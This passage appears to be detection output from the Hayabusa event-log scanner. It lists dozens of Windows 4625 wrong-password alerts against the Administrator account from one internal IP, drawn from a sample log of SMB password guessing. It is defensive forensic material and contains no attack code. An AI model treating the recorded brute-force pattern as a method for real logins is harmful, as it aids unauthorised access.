01:52:38.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1lfwqPB0AgTfIOt4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mJuG26pQzdjUQael : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GXwEziYTA3DkkFVq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CHr6dirvkT8B9ZVs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.623 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B5eSMLiF4BsfY3xN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 64ISDuFRhR6cFYVQ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hcprXytyuBw380XY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BxfQWiSIhZYxwNjh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FcL982boDelzeyzK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NBAAjRdaR8U0tqt7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EmqUjcltAW6StHQJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:38.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 129Rp3HCmRVRXw3C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jpIIQP2oWEF51EBI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.975 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HREGh5ppEkLAuEob : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.022 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UVkpQvotEMfM8R0C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dm6uHEy5RJJBJ6FG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HPTyAkYjcIlko5lu : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.155 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OjlRoo9Sot4Fx4Th : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.205 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XslY26kw2aBw19D8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.242 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1404fakprYeqGiNY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y2VfIjtBcXCRlOjp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.317 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LPztyX4J9NV8EldT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:39.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 07flrrzWgsVBYaN2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vgkqkC1VvznGxR6N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.461 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hMn6yDMLgLChJTL6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.501 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uSTokOJ31Tj0bLXv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.534 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TyRifC46GrNpTA4x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CvNaby30vAT9drAX : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wkYSOQ2bD51a4U8l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rqdOquL9Ax01RPPU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.705 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nqCCiK5arcyRHha6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TpyTGZLkAb0w0kgW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wa2pXrZKxeZZYKAq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:39.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dK0N5KeBgCze1YWi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g4dHlwZjMzI5wU2s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GzF2ouP5KkRfsxnf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RSQxMrGlDiAOo6ri : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gL0rz3p1yG6RhfAT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oyChoTSKgJeK6yqs : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.234 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tG4I11dwpBM9SM3l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B7foAZ5Y1igCbHap : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ATDXUljQwg8WvUVs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QdmXaJqQMAG2g6Ao : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.413 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bjame5puT5CDeoIG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:40.454 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0FGGVVkckmdURVh6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.485 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j0Smqw4cA4wG2Q6m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KLWloOhUYEQlj6y6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Tuxuykh0j5afeTH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.609 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aeXS6QwYhqJAOeuz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AqFSJCq5bmBW6dj1 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.718 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DH1zyt1hxTgzajhW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.761 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rrZxcWjUX4OgYYIb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.807 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ExtkYXSJI8F41uvw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sLh1Q3RieOoukiCT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.881 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kNb2hZDxi4QrbQpx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:40.923 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jCb1TMlFj2PjH2sA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rgF42C57Nx6F3HU3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KZfFH9geIrxVYowJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.039 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pWz1XeyxywR0o5gS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: og1kItEC6WhqXF37 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.121 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q0KhaJlD6tWwF2ky : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.165 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XUy0EKmjyD6ZYENA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h3MdGstPPFJDGzwG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VTs0ZQa6LGrKZKsY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FefzWjMXSvMdvqcw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.345 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hlnUt9tPRSXR5mWs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:41.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dehb4M6pcxi56Bkl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tLXHvGiUqZyxax4W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bP1gKcf1eeKm0RB1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ldbN1odP77n0BOzO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.562 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: drRC8qCbPe5e4mdR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.607 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lBg39AUtzZi6Q4iz : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: huv5YEPo1n7UiFkq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9CLLwao1NDtBulxs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SB88EHHhDWhvJI87 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.782 